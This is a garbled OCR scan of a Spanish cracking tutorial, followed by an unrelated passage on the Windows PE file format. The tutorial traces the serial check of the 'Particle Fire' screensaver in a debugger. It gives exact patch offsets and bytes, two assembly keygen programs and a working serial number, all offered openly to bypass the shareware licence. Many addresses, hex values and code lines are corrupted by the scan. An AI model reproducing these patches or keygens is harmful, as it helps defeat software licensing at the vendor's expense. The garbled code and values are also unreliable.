Ahora que creemos tener una leve orientación sobre lo que buscamos, hacemos pruebas a base de 
poner break-points en las típicas funciones que capturan el texto de un cuadro de diálogo, 
comparación de cadenas, etc. Pero... no parecen llevarnos a ninguna parte. 


Quizás los autores del Particle Fire quieran echarnos una mano ;) echamos un vistazo al read-me que 
lo acompaña. Allí encontramos un par de informaciones interesantes: 


(1) 'asegúrate de introducir correctamente el serial-num' 
(2) 'por favor no digas a nadie tu número de registro" 


Traducción: 


(1) no hay mensaje tipo "gracias por registrarte' o 'serial num incorrecto' 
(2) el número es independiente de tu nombre, disco duro, etc.. 


Si bien el punto (2) nos facilita un poco las cosas, el (1) las complica porque significa que, 
posiblemente, la comprobación del serial num no se realiza cuando lo entramos en 'configurar' si no 
al correr el salvapantallas. Es decir, la típica relación causa-efecto entre el serial/keyfile/etc y nag 
screen/reminder/lo que sea, está en cierto modo disociada, separada, retardada. 


Sin embargo, tiene que haber un nexo de unión entre ambos. El número que entramos en configurar, 
el Pfire lo tiene que leer de algún sitio. Yo ya me imagino donde está, pero vamos a correr el Regmon 
para asegurarnos... ejecutamos el salvapantallas y nos encontramos con que, antes de comenzar, lee 
una serie de parámetros del registro. Entre ellos, el serial num... si hacemos doble click sobre esa 
línea desde RegMon, se abrirá el RegEdit en esa rama, y veremos que el Pfire, como buen 
screensaver, tiene guardaditos ahí sus parámetros, incluido el serial num que le hayamos puesto... 


estos parámetros los debe de leer el Particle Fire cuando se ejecuta como salvapantallas... que bien... 
porque hace poco estuve leyendo algo sobre la función API RegQueryValue, que precisamente es 
la que lee datos del registro. Pero en realidad hay varias parecidas; RegQueryValue, 
RegQueryValueEx y RegQueryValueA. Para Win32 ansi la 'ExA' es la que nos vale, pero por 
si tenemos duda en estos casos, abrimos el fichero en el w32 Dasm, y le damos al botón de funciones 
importadas; allí nos aparecerá, para este caso, la función RegQueryValueExA, junto a otras funciones 
tipo OpenKey que van "abriendo" el camino para la QueryValue. Creo que el serial num se debe 
sentir un poco solo, así que vamos a tratar de acompañarle durante su viaje, a ver que hacen con él. 
Antes de empezar, escogemos un serial que nos haga de referencia, para identificarlo luego cuando lo 
lea y lo compare o haga lo que sea con él. Basándonos en nuestras pruebas, ponemos 1000000000 
(mil millones) en la pantalla de configurar (podemos poner otro, pero recordemos cual), aceptamos y 
salimos. Tomamos tambien nota del equivalente en hexadecimal de nuestro número, para que no nos 
cojan desprevenidos; 3B9ACA0O. Ahora pondremos el breakpoint y trataremos de subirnos al tren a 
la vez que lo hace nuestro serial. 


2. Manos a la obra: un breakpoint en la lectura del registro 


Para ello, ctrl+d, bex RegQueryValueExa, ctrl+d. Traducción: entramos al Softlce, ponemos un 
breakpoint en la función de Windows que lee del registro para que el Softlce nos avise y salimos otra 
vez a Windows con ctrl+d. Ahora tenemos dos opciones, ejecutar nosotros mismos el salvapantallas o 
esperar que salga (previamente le habremos puesto el mínimo tiempo, un minuto). Esto puede parecer 
una tontería, pero si lo ejecutamos directamente, aparecerán unas 50 llamadas-basura a la función 
RegQueryValueExaA (por lo menos a mi me pasa). Si esperamos que salga el Pfire por si solo, ya 
casi estaremos en el punto (nota: puede que durante la espera nos salte el breakpoint hasta 10 veces o 
más -o quizás ninguna-, por accesos rutinarios del sistema al registro; lo ignoramos haciendo ctrl+d 
para salir otra vez, y seguimos esperando hasta que pase el minuto y nos salga el pfire; para disminuir 
el riesgo de que pase esto, mejor no tener programas abiertos o solo lo imprescindible, y 
evidentemente, no tocar ninguna tecla ni mover el ratón). 


Al cabo de un minuto, nos sale un breakpoint. Este ya es del propio Pfire, ya que en el borde inferior 
derecho del Softlce pondrá 'Particle Fire". No obstante, las primeras llamadas aún no nos 
interesan. Si hacemos F12, veremos que se ha llamado a la función a través de un CALL ESIo 
CALL EBX. Mientras esto suceda (seguramente saldrán 4 llamadas de este tipo en total, dos de cada), 
vamos haciendo ctrl+d, hasta que llegue un momento en que al salir el breakpoint y apretar F12 
veamos que se ha llamado a la función por su nombre, algo así como: 


PUSH ECX 


PUSH ESI 

PUSH ESI 

PUSH 004147F8 

PUSH DWORD PTR [EBP-04] 

CALL [ADVAPI32!RegQueryValueExA] 
TEST EAX, EAX 


(insisto, ten en cuenta que no 'aterrizas' directamente aquí, tienes que haber pulsado F12) 


Vamos a comentar la jugada: en azul, los PUSH van pasando uno a uno los parámetros de la función, 


a la cual se llama con el CALL, en rojo. Concretamente, el penultimo valor contiene la dirección de 
memoria donde se halla el nombre del valor que se quiere leer (esto lo sabemos si miramos la 
documentación de referencia de WinAPI32). En este caso, vemos que es 4147F8, así que hacemos 
und 4147F8 para que el Softice nos muestre que hay en esa dirección. Veremos en la pantalla de 
datos (si no la tienes a la vista, se pone/quita con wd) que es 'screensaveusepassword'. Bueno, esto no 
nos interesa, solo debe estar comprobando si tenemos puesto password con el salvapantallas o no. Así 
que ctrl+d, y de nuevo ha saltado el breakpoint por otro acceso al registro. Pulsamos F12 para ver 
quien le ha llamado y como, y tenemos: 


015F:00404F7A PUSH EAX 

015F:00404F7B PUSH ECX 

015F:00404F7C MOV EAX, [ESI+00000400] 
015F:00404F82 PUSH EDX 

015F:00404F83 PUSH 00 

015F:00404F85 PUSH EBX 

015F:00404F86 PUSH EAX 

015F:00404F87 CALL [ADVAPI32 ! RegQueryvalueExA] 
015F:00404F8D TEST EAX, EAX 
015F:00404F8F JNZ 00404FA7 
015F:00404F91 MOV EAX, (ESP+14] 
015F:00404F95 MOV ECX,ESI 
015F:00404F97 MOV [EDI],EAX 


Reconocemos la idea otra vez, ¿no? En azul, son los parámetros que pasamos, en rojo la llamada a la 
función. Como veríamos si siguieramos saliendo y entrando, este fragmento del código es el que a 
partir de ahora se repetirá en cada lectura de valores del registro (claro que cada vez se lo montará 
para usar parámetros distintos, si no siempre haría lo mismo, pero será el mismo trozo de programa), 
de modo que vamos a borrar nuestro breakpoint con bc 00, y a poner otro justo en el punto donde 
llama a la función, para que antes de llamarla podamos ver qué pretende hacer; así que ponemos bpx 
404£87 (fíjate cual es esta dirección en tu caso; podría ser otra). Este cambio de breakpoint no es 
100% imprescindible, pero así nos ahorraremos darle al F12 cada vez y todo será más claro, puesto 
que pararemos ANTES de entrar en la función RegQueryValueExa. Por cierto, antes de salir 
hacemos d ebx y vemos : RandomTime, uno de los parámetros. Bueno, aún no es el que nos 
interesa, pero parece que estamos en el buen camino... 


Así que ctrl+d para salir, y boom, ya estamos otra vez en Softlce, justo antes de llamar otra vez a 
RegQueryValueExaA (no hemos de pulsar F12). Vamos a ver que quiere leer ahora... hacemos d 
ebx, y nos sale GravityTime... otro parámetro, y justo despues suyo pone RandomTime...mmh, 
es el anterior... usamos alt+flecha arriba/abajo para desplazarnos por ese listado, y vemos como 
encima de esos parámetros, están los demás haciendo 'cola", concretamente deberíamos estar viendo 
RandomColor, ColorScheme, Particles y ... nuestro querido SerialNum! Pues bueno, 
como es evidente se trata de ir haciendo ctrl+d y comprobando ebx (todo el rato el listado será como 
el que he puesto más arriba) hasta que estemos en el punto en que va a leer el serial num. Son 4 
veces, pero es recomendable ir uno a uno y comprobando ebx hasta que veamos que apunta 
directamente a SerialNum. Ahora querremos ver que hace con él, así que vamos a ir trazando la 
función. Estamos situados en el CALL [ADVAPI32 ! RegQueryvalueExA]; pulsamos F10 
puesto que no nos interesa seguir a la función API en sí (tanto F8 como F10 ejecutan igual el 
programa, pero con F10 nos ahorramos ver la ejecución de CALLs como este que no nos interesan). 
Ahora representa que hemos vuelto de la función que lee el registro, y el valor de nuestro serial num 
de prueba debe andar en alguna parte. Observemos las lineas siguientes al CALL: 


15F:00404F87 CALL [ADVAPI32 ! RegQueryvalueExA] 
15F:00404F8D TEST EAX,EAX 

15F:00404F8F JNZ 00404FA7 

15F:00404F91 MOV EAX, [ESP+14] 

15F:00404F95 MOV ECX,ESI 

15F:00404F97 MOV [EDI],EAX 

15F:00404F99 CALL 00404EC0 


o0o0O0oOo0oOo0ooOoOo 


El test eax,eax y el jnz parecen una comprobación de rutina a la vuelta de la función. Los 
movimientos que hay despues parece que sean mas deliberados. Echamos un vistazo a esos valores, 
teniendo en cuenta que nuestro serial 1000000000 en hexadecimal es 3B9ACADOO. Haciendo d 
esp+14, enseguida encontramos que en esa dirección está nuestro querido serial, que es copiado a 
EAX (nota: si veis el serial 'al revés' o sea OOCA9A3B, pulsad SHIFT+F3 para cambiar el formato de 
la ventana data hasta verlo como DWORD - gracias PicsOne!). Pero no le perdamos la pista, porque 
dos lineas más abajo vuelve a cambiar de vagón: ahora EAX se copia a la dirección apuntada por 
EDI. Bueno, pues miramos el valor de EDI con ? edi, y en mi caso es 412114. Ahí se sienta mi 
serial, así que vamos a poner un breakpoint para que cualquier acceso a esa posición de memoria sea 
detectada; ponemos bpm 412114 (ojo, no bpx si no bpn : no controla la ejecución si no la 
manipulación de lo que hay en ella). Tambien quitamos el bpx 404£87 que teníamos, puesto que 
ya nos ha aportado lo que queríamos; bc 00, ctrl+d y salimos del Softice. 


3. La rutina de comprobación del serial 


Y en una fracción de segundo ya hemos vuelto al Softice. Alguien está metiendo mano a nuestro 
serial. Vemos lo siguiente: 


015F:00402726 MOV EAX, [00412114] 
015F:0040272B PUSH EAX 
015F:00402720 CALL 00401000 
015F:00402731 ADD ESP, 04 

015F :00402734 TEST EAX, EAX 
015F:00402736 JNZ 00402A69 


En pocas palabras, carga nuestro serial en EAX, lo envía a la pila con un PUSH y llama a algún tipo 
de rutina en la 401000... ¿quizás la que comprueba si es correcto? Vamos a seguir la rutina; vamos 
pulsando ES (ahora si que nos interesa ver qué hace el CALL) hasta que al ejecutar el CALL, 
llegamos a una rutina que es ya la pieza clave de todo el asunto; veámosla parte a parte: 


015F:00401000 MOV EAX, [ESP+04] 

015F:00401004 PUSH ESI 

015F:00401005 CMP EAX,3B9ACAOO ; compara con 1000000000 
015F:0040100A JBE 00401049 ¿ si menor o igual, fracaso 
015F:0040100C CMP EAX, 77359400 ; compara con 2000000000 
015F:00401011 JAE 00401049 ¿ si mayor o igual, fracaso 


Esta primera parte en azul hace lo siguiente: recupera en EAX el valor de la pila (ESP+04), que como 
sabemos es nuestro serial, y a continuación comprueba que sea mayor que 3B9ACA0O (mil millones 
en decimal) y menor que 77359400 (dos mil millones en decimal). Si no es así, salta a la 401049, 


la cual huele a fracaso porque es más fácil ir a parar a ella que evitarla. No ibamos tan mal 
encaminados, ahora sabemos el rango concreto en el que se situa el serial. Claro que hay mil millones 
de números en ese intervalo, y si tenemos planes para el resto de nuestra vida, no vamos a poder 
probarlos todos. Veremos que más comprueba si el número cumple el requisito anterior. El código 
que viene ahora lo podemos ver, aunque al ir trazando con E8 no lo ejecutará (saltará a la 401049 tras 
la primera comparación) ya que nuestro serial no es MAYOR que mil millones. Si quisieramos trazar 
esta parte del código para ir mirando como cambian los registros, etc, podemos hacer una pirula; 
situarnos con el ratón en EAX y cambiar su contenido de 3B9ACA0O (nuestro serial) a 3B9ACAO1, 
por ejemplo. Sea como sea, veamos lo que viene ahora, resaltado en rojo: 


015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F': 
015F: 
015F': 
015F': 
015F': 


00401013 
00401015 
00401017 
0040101A 
00401010 
0040101F 
00401025 
00401028 
0040102A 
00401020 
0040102E 
00401030 
00401033 
00401035 
0040103A 
0040103€ 
0040103E 
00401040 
00401042 
00401047 
00401048 
00401049 
0040104B 
0040104C 


ECX, EAX 
ESI,EAX 

ECX, 14 

EDX, EAX 
ESI,10 
ECX,FFF00000 
EDX, 10 


ESI,ECX 
ECX00002694 
EAX, ESI 

ECX 

EDX, EDX 
00401049 
EAX, 00000001 
ESI 


EAX, EAX 
ESI 


En pocas palabras: el tramo resaltado en rojo hace unas operaciones con nuestro número; el tramo 
siguiente, en blanco, determina si el número ha "pasado la prueba", y de no ser así, nos envía a la 
401049... sí, la que olía a fracaso, aquí de color gris, que es la vía de salida de los perdedores... Pero 
por suerte nosotros no somos de esos. Nos interesa recorrer todo el tramo blanco, donde vemos que 
basicamente vuelve copiando un 1 en EAX, que a mi me huele que es una especie de flag tipo 'si, 
teniente; el chico está limpio", ya que en caso contrario, lo primero que se hace en la 401049 es 
poner eax a cero conel xor eax, eax así que veamos por donde atacar.. 


Lo primero que deberíamos pensar, una vez suponemos que este es el punto clave, es que todo ese lío 
en color rojo no merece que nos rompamos la cabeza; lo más fácil es parchear algo, tipicamente las 
comparaciones y/o los saltos. Es un principio del cracking elegir la vía más fácil y no calentarse la 
cabeza gratuitamente. Aunque por otra parte, también se dice que hay que ser lo más elegante 
posible, entendiendo esto como practicar la mínima intrusión al modificar el código del programa. Y 
desde luego si queremos aprender algo, habrá que hacer caso de lo que dicen los que saben del tema. 
Claro que tambien nos advierten de que en la práctica se dan casos como este, donde nos 
encontramos en una disyuntiva; lo más fácil es parchear, pero lo más elegante es generar un serial 
bueno sin tocar el programa original. En este caso, decidí que buscaría un serial correcto más por 


aprender algo que por otra cosa, pero en este tutorial desarrollaré ambas posibilidades; la de parchear 
es más apropiada para principiante, y la de analizar el código en rojo y encontrar un serial para 
amateur (requiere un poquito más de esfuerzo). Comencemos por el parcheo. 


4. Opción fácil : parchear 


Como sabeis, parchear consiste en sustituir unas intrucciones por otras; típicamente se cambian saltos 
y comparaciones por 'nops' (NOPs = no operation, o sea no hacer nada). También, en casos como 
este, podíamos haber considerado pasar de todo y 'borrar' los mensajes shareware parcheando con 
'00', pero por varios motivos no me parece una vía con futuro. El caso es que siempre hay varias 
opciones, pero en nuestro caso creo que la más simple sería parchear los 3 saltos a la 401049 con 
nops, de modo que si el número es menor que un millardo o mayor que dos, o si no cumple la 
condición que luego se aplica, en vez de saltar a la 401049, no hace nada y sigue. Con lo cual el 
código correrá sin alteraciones en su flujo hasta el final del tramo blanco. Así que ponemos code on, 
y vemos el valor de los bytes que equivalen a esas instrucciones en el fichero; la primera 
comparación es 3d00ca9a2b, el primer salto jbe es 7636, la segunda comparación es 
3400943577, el segundo salto jae es 7336, y el último es 7507 (en realidad solo nos interesa el 
código de los saltos, pero tomamos nota de los que van antes y despues para luego asegurarnos que 
hemos encontrado el correcto). Ponemos el editor hexa, en mi caso el hiew, cargamos el fichero, 
pulsamos F4 y elegimos hex, y pulsamos F7 para buscar. Con la tecla tab saltamos al campo 'HEX' y 
tecleamos 3400ca9a3b763d43d00943577 (o solo 763d pero luego a ojo miramos que lo de 
antes y despues es lo que esperábamos, si no seguimos buscando). Así nos aseguramos de estar en el 
punto correcto comprobando que los códigos anteriores y posteriores coinciden con los que anotamos 
antes. El hiew nos situará al principio de la localización de la cadena de bytes hallada. Como todo 
está en la misma zona, localizando el 763d ya vemos a ojo los demás un poco más abajo. Pulsamos 
F3 para editar, y situándonos en los lugares correctos, cambiamos 763d,7336 y 7507 por 9090, 
9090 y 9090 (si metemos la pata, con esc deshacemos los cambios y luego empezamos de nuevo). 
Si esta ok, pulsamos F9 para grabar los cambios en el fichero. Para hacerlo aún más fácil, ahí va una 
lista de los offset locales, el valor original de cada byte y el valor parcheado: 


File 1: File 2: 
Offset: ORIGINAL PARCHEADO 
40Ah 76h 90h 
40Bh 3Dh 90h 
411h 73h 90h 
412h 36h 90h 
440h 75h 90h 
441h 07h 90h 


Number of differences: 6 


(en el hiew, para cambiar entre vista de offset local y offset global, pulsa alt+f1) 


En fin, si despues de esto aún te quedan ganas, puedes buscar un crackmaker y crear tu propio crack a 
partir del fichero original (del que habrás guardado una copia) y el que acabamos de parchear. 


5. Opción no tan fácil: análisis de la rutina de chequeo del serial 


Aunque a mi que no tengo ni idea del tema me dió un poco de dolor de cabeza, solo es cuestión de 
unos minutos y paciencia descifrar el mecanismo que sigue el código que más arriba resalté en rojo. 
Si nuestro número es "+", el programa realiza la siguiente comprobación: 


XOR [ [ XOR (OR a,b , AND c,d) hy 281] 


, donde, si "+" es igual al serial introducido: 


a = shl (*,10) 
b = shr (+,10) 
c= shl (+*,14) 
d = fff00000 

e = shr (*,0c) 


Una vez calculado el churro en cuestión, llamémosle "F" al resultado, realiza otro xor: 
XOR ($,F) 


, y sobre este resultado, efectua una división (DIV) por 2694h (la 'h' quiere decir que está en 
hexadecimal, como sabreis). Si la división tiene resto (módulo), fracaso (también conocido como 
billete de ida a la 401049). Por ejemplo, para 3B9ACA01 (1000000001 en decimal), el resto es 
26£,0 lo que es lo mismo, distinto de cero, o lo que es lo mismo, de cabeza a la 401049, o lo que 
es lo mismo, fracaso, chico malo, etc. 


El caso es que integrándolo todo, podemos formularlo como una ecuación. Pero ignoro si es posible 
solucionarla de modo analítico (reordenando, simplificando, despejando...), ya que para una cosa que 
si que sé un poco (matemáticas), me encuentro con un tipo de funciones (and, or, xor...)a las 
que no estoy acostumbrado. Caso de poderse solucionar, como que ha de tener muchas soluciones (no 
va a haber un único serial), nos quedaría en función de un valor que daríamos nosotros, en plan 
f()=y. Pero como digo, yo no sé solucionarlo así. De modo que la alternativa son los métodos 
numéricos (o sea, probando hasta que hallemos un número correcto - con la potencia de cálculo de un 
ordenador, sería cuestión de fracciones de segundo). Yo pretendía probarlo con el solver del Excel 
(da valores hasta encontrar una solución) pero... no puedo utilizar esas funciones porque no están 
disponibles en el Excel (alguna lo está, pero que yo sepa solo con resultados booleanos tipo 
verdadero/falso, no resultados numéricos). De modo que ya que en assembler existen están funciones, 
quizás pudiéramos programar algo... si, hombre, que nadie se asuste, yo no sé casi nada de assembler 
pero mira ahí arriba... el 90 % de nuestro keygen ya está hecho. Simplemente hemos de cambiar que, 
si el número no da resto cero tras la transformación, en vez de "echarnos", aumente una unidad al 
número inicial y pruebe de nuevo. Yo, la primera vez, hice algo muy simple; una rutina que comienza 
por 1000000000, y a partir de ahí, hace un cálculo; le suma una, le hace todo el churro de más 
arriba, y si no da el resto cero, vuelve a sumarle uno, hacer todo el churro... hasta que salga uno 
bueno. Como no sabía cómo mostrar ese número, se me ocurrió poner un messageboxa una vez 
sale del cálculo, antes de terminar el programa, para poder poner un bpx y ver que número había 
salido (hice que cada vez la rutina guardase una copia del número que prueba en EDI, porque el 
original en EAX queda 'desfigurado' por la comprobación). Así que una vez ensamblado, pongo un 
bpx messageboxa, y cuando me sale, le doy a F12 para volver a mi programa principal, y escribo 
? edi,obteniendo 1000002675 en decimal, esto es, ¡el serial del cliente número uno! (que 
honor, seguro que lo reservaban para alguien importante). El programa lo ensamblé con el mASM32; 
como digo no sé assembler más que 4 cosas, por lo cual no puedo entrar en mucha explicación sobre 


parámetros de ensamblado, etc, simplemente creé el ejecutable. Si no me equivoco, era así: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32Xincludewindows.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm32Xliblkernel32.lib 
include c:imasm32Xincludeluser32.inc 
includelib c:imasm3211libluser32.1lib 

¿ cosas generales para ensamblar y linkar 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

MsgBoxText db "Bpx en el NOP y el resultado en EDI",0 
Serial_Start dd 3b9%aca00h 

¡; reservamos e inicializamos unas variables del msgbox 
¿ y el número de inicio (1000000000) 


. code 

start: ¿ Vamos a por ello 

Calculo: 

inc [Serial_Start] ¿ aumentamos en uno el número de partida 

mov eax,Serial_Start ; lo pasamos a EAX para hacer el test 

mov edi,eax ¿ pero edi guarda una copia por si sale bien 
mov ecx, eax ¿ y comienza la fiesta... 


mov esi,eax 
shl ecx, 14h 
mov edx,eax 
shl esi,10h 
and ecx,0fff00000h 
shr edx, 10h 
or esi,edx 
sub edx, edx 
xor esl,ecx 


mov ecx, eax 

shr ecx,0Och 

xor esl,ecx 

mov ecx, 2694h 

xor eax,esi 

div ecx 

test edx,edx 

jnz Calculo ; si no es un serial válido, prueba otra vez 

invoke MessageBoxA, NULL, addr MsgBoxText,addr MsgBoxCaption,MB_OK 
; este messagebox hace saltar el breakpoint y nos permite mirar 
¿ en EDI el último número probado, es decir el bueno 

invoke ExitProcess, NULL 

end start 


Espero que al menos se entienda la idea. Mi intención es que otros como yo le pierdan un poco el 
miedo al assembler y vean que, aunque falten conocimientos, con un poco de ingenio a veces se 


pueden solucionar los problemas. 


6. Opción no tan fácil: creación de un keygen semi-decente 


Pero como crear un key-gen, nada. Yo al final creé uno, estoy seguro que está fatal programado, que 
da pena y que quizás solo funcione en mi PC, pero me da números de registro buenos. He de decir 
que no podría haberlo creado sin la *gran* ayuda de Mr. Crimson que me proporcionó una rutina 
para convertir de hexadecimal a decimal (para poder sacar el resultado como string en un msgbox). 
Muchas gracias una vez más, Mr. Crimson. El programa también utiliza la funcion gettickcount 
para crear un número distinto cada vez, aunque no totalmente aleatorio (cada vez es mayor). No es 
perfecto ni mucho menos, pero da el pego. Para el que le interese: 


.386 

.model flat, stdcall 

option casemap:none 

include c:imasm32lXincludelwindows.inc 
include c:imasm32Xincludelkernel32.inc 
includelib c:imasm321liblkernel32.1ib 
include c:imasm32Xincludeluser32.inc 


includelib c:imasm321libluser32.1lib 


. data 

MsgBoxCaption db "SuperCutre's Key-Gen",0 

Mensaje db " = (by Champion) =",13,13," Se va 
a generar un",13," número de serie 

para",13," Particle Fire vl.la",0 


MsgBoxCaption2 db " Su número:",0 
Buffer db 10 dup(0),0 
Serial_Start dd 3b%aca00h 


. code 
start: 


invoke MessageBox,NULL,addr Mensaje,addr MsgBoxCaption,MB_OK 


invoke GetTickCount 
add [Serial_Start],eax 


Calculo: 
inc [Serial _Start] 
mov eax, Serial_Start 
mov edi, eax 


mov ecx, eax 
mov esi,eax 
shl ecx, 14h 
mov edx,eax 
shl esi,10h 
and ecx,0fff00000h 
shr edx, 10h 
or esi,edx 


sub edx, edx 
xor esl,ecx 
mov ecx, eax 
shr ecx,0Och 
xor esl,ecx 
mov ecx, 2694h 
xor eax,esi 
div ecx 

test edx,edx 
jnz Calculo 
nop 


mov eax,edi ; lo preparo para la Hex a Dec 
mov esi,offset Buffer 


add esi,11 
mov byte ptr[esi],00 
dec esi 


; Hex a Dec proporcionado por Mr. Crimson 
mov ecx,00000010 
c20: cmp eax, ecx 

jb c30 

xor edx, edx 

div ecx 

or dl1,30h 

mov byte ptr[esi],dl 
dec esi 

jmp c20 

c30: or al,30h 

mov byte ptr[esil],al 


invoke MessageBox,NULL,ESI,addr MsgBoxCaption2, MB_OK 
invoke ExitProcess, NULL 
end start 


7. Conclusiones finales 
Para terminar veamos a modo de resumen lo que hemos hecho: 


1. Poner bpx en regqueryvalueexa 

2. Encontrar donde lee y guarda nuestro serial 

3. Encontrar la rutina que luego lo lee y lo verifica 

4. Estudiar ese código y ser capaces de crear una clave válida 


He de decir por pen-último, que con posterioridad a todo lo explicado, me he encontrado dos patchers 
en internet para Particle Fire v1.1a, pero ningún keygen, lo cual confirma que lo más fácil es parchear 
bien y no mirar a quien. Asímismo, de los dos parcheadores, uno no funciona (al menos a mí), y el 
otro me parece que no tiene mucho estilo, porque lo que hace es dedicarse a sustituir el inicio de 
todas las cadenas de texto por 'DO' para evitar que salgan (si recordais, durante el tutorial hemos 
considerado esta opción pero la descarté porque es poco elegante, tediosa, y no sabes hasta que punto 


te garantiza resultados). Aún peor, ese patch sustituye *todas* las cadenas de texto, con lo cual se ha 
cargado no solo los mensajitos shareware si no también la parte de frases aleatorias que forman parte 
del salvapantallas estés registrado o no, y que pueden anularse con una simple casilla del cuadro 
'configurar protector de pantalla', con lo que más que parchear, se ha mutilado el programa 
innecesariamente. 


Ahora sí, por último, pedir disculpas si algo no ha quedado bien explicado, o por los errores que sin 
duda habré cometido, pero puedo asegurar que con este sistema me he librado de los mensajitos no 
deseados. Y, bueno, ahora ya puedo volver a mi antiguo salvapantallas con la cabeza bien alta... 
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Descabezando archivos ejecutables portables 


Introducción 


He tenido noticias de algunos interesados en conocer sobre un tema en el que he estado trabajando: el formato de los 
archivos ejecutables portables, conocidos como los "PE files". Como acostumbro a llevar notas de lo que hago, he 
reunido y ordenado este material esperando que pueda ser útil. No me responsabilizo del uso que hagan otros de él. 


PE es el formato adoptado por W32 (Windows a 32 bits) para sus archivos ejecutables (EXE), sus librerías dinámicas 


(DLL), dispositivos virtuales (VXD), etc. W32 adoptó este formato debido a las posibilidades que quedaban abiertas al 
implementar direcciones y punteros de 32 bits y debido al manejo de la memoria que estas posibilidades exigían. 


ALGO SOBRE MEMORIA VIRTUAL 


W32 implementa un manejo de memoria que supone paginación, dividide la memoria física en bloques de memoria fija 4 
KB llamados "páginas". Al proceso de dividir la memoria en páginas se llama paginación. Se trata de una técnica muy 
empleada en los sistemas operativos multitareas (capaces de ejecutar más de una tarea al mismo tiempo) para manejar la 
memoria dinámica del sistema (RAM = Randow Access Memory = Memoria de Acceso Aleatorio) de manera que 
ninguna tarea altere los datos de otra o la intervenga negativamente en su comportamiento. 


W32 emplea punteros y direcciones de 32 bits. Esto quiere decir que, si lo tuvieramos, podríamos usar una memoria de 
4GB para cada programa en ejecución. Pero aunque no tengamos todavía ships con esta capacidad de memoria, los 
programas en W32 corren como si la tuvieran a su disposición. El sistema W32 asigna a cada proceso o programa en 
ejecución un espacio de direcciones ficticio de 4GB, un montón de memoria que sólo existe imaginariamente, llamada 
"memoruia virtual". Luego, para ejecutar código del programa o disponer de sus datos, transforma, a través de un par de 
tablas, las direcciones ficticias en direcciones reales en la memoria física. 


Para comprender cómo W32 transforma direcciones virtuales en direcciones físicas para que el CPU pueda acceder a las 
instrucciones del programa montadas en la RAM, sugiero la lectura del artículo "La Memoria en W32: intro" que 


seguramente acompaña a este que lees ahora. 


El tema de la memoria virtual da para más y conviene tratarlo aparte. Ahora nos ocupan los PE. 
- 
Vi 


Teoría y un poco de práctica.. 


ARCHIVOS EN GENERAL Y EL FORMATO PE 


Un archivo no es más que un conjunto de datos organizados en varias entidades llamadas "registros". Un registro es lo 
que conocemos en programación como "estructura", es decir, un espacio en memoria que se emplea para guardar datos 
de manera ordenada. 


Una estructura se divide en entidades de tamaño definido destinadas a almacenar datos de justo ese tamaño. A cada una 
de estas "celdas" de la estructura la llamamos campos. 


Las estructuras o registros permiten almacenar información, en sus campos, sobre entidades particulares. En este sentido, 
la estructura es una colección de campos que pueden ser tratados como una unidad por algún programa. Es un bloque de 
datos organizado en campos sobre una entidad específica.Toda estructura posee un nombre que la identifica y permite 
localizarla o manejarla; este nombre es una varable del tipo de la estrcuctura que nombra y permite el tratamiento de las 
entidades de las cuales informa la estrcutura. 


Ahora bien, a la información contenida en un archivo se puede acceder de manera secuencial o directa. El modo 
secuencial es lento en muchos casos ya que se necesita revisar cada dato desde el comienzo del archivo con orden 
secuencial, hasta dar con el buscado. Por esto, la mayoría de las veces lo mejor es ir directamente al dato buscado, sin 
tener que revisar todos los campos del archivo. 


Para facilitar el acceso directo a los datos, se pueden colocar unos directorios al comienzo del archivo que indiquen 
dónde se encuentran ciertos tipos de datos. Los directorios son estructuras cuyos campos, llamados entradas del 
directorio, son tablas que tienen la misma estrcutura. Funcionan como un "directorio" telefónico. Si busco un dato de 
cierto tipo, reviso el directorio y veo dónde están agrupados esos datos. Luego voy a la sección donde se encuentran los 
datos de este tipo. Seguramente en esta sección habrá una tabla que me informe sobre lo que hay en ella. Reviso entonces 
esta tabla y con lo que me dice, busco el dato que me interesa: no tengo que ir dato por dato para encontrar lo que busco. 


Este es el principio a partir del cual se ideó el formato de los archivos PE, y facilitar el montaje del programa en la RAM: 
se coloca al principio del archivo una serie de estructuras que informan sobre el contenido del archivo. El contenido del 
archivo se divide en secciones cada una con datos de cierto tipo, formando el cuerpo del archivo. Las estructuras al 
comienzo del archivo forman el encabezado del archivo y nos dicen la dirección donde se ubica cada sección, su tamaño 
y sus atributos. A la vez, cada sección implementa tablas con información particular sobre el contenido de su cuerpo. 


Entonces, en los archivos con formato PE, tenemos un encabezado y un cuerpo. El encabezado de los archivos PE se 
subdivide en, podríamos decir, cuatro subencabezados: 


El encabezado DOS MZ 

El encabezado PE 

El encabezado NT opcional 

El conjunto de tablas de secciones 


Veámos la organización en la siguiente tabla: 


PE EXE (Windows 32Bit EXE, DLL, OCX, etc) 


Contiene información necesaria para ejecutar el DOS 
STUB. Conservado por compatibilidad 


Encabezado MZ EXE 


El desol : OFESET) 3Ch 7 Encabezado DOS 
Encabezado MZ extendido esplazamiento ( ) apunta a 
encabezado PE 
Agregado para 


avisar que el 
programa rueda en 
Windows 


Usualmente despliega 'Requires windows to run' o un 
mensaje similar 


DOS STUB 


Encabezado PE Contiene info necesaria para correr el programa en 
Win32 
Contiene info adicional necesaria para correr el O 
Encabezado opcional NT ] P agregados por W32 
programa en Win32 


EEE PEA ., . . . 
Tabla de Objetos o Secciones Información sobre objetos o secciones en el archivo 


Datos de las secciones 


Objetos o secciones Cuerpo del archivo 


El cuerpo del archivo con formato PE se subdivide en un número no fijo de secciones, cada una de las cuales dividida 
también en una tabla de sección, que nos informa sobre el contenido de la sección, y el cuerpo de sus datos. 


Veamos ahora con detenimiento el encabezado. 


RASTROS ARCÁICOS: ENCABEZADO DOS MZ 


Los archivos ejecutables con formato PE inician con el encabezado DOS MZ, que no es más que el antiguo encabezado 
de los archivos EXE más algunos campos adicionales que se agregaron para posibilitar la transición. 


El encabezado DOS, conservado por compatibilidad, es el mismo que empleaban los antiguos programas DOS de 16 bits, 
más unos campos adicionales. Su estructura (en ensamblador) es: 


_IMAGE_DOS_ HEADER STRUC 
SII 
; CAMPOS TRADICIONALES 
SIA LIA AIR II 
e_magic DW ? 

e_cblp DW ? 

e_cp DW ? 

e_crlc DW ? 

e_cparhdr DW ? 

e_minalloc DW ? 

e_maxalloc DW ? 

e_ss DW ? 

e_sp DW ? 

e_csum DW ? 

e_ip DW ? 

e_cs DW ? 

e_lfarlc DW ? 

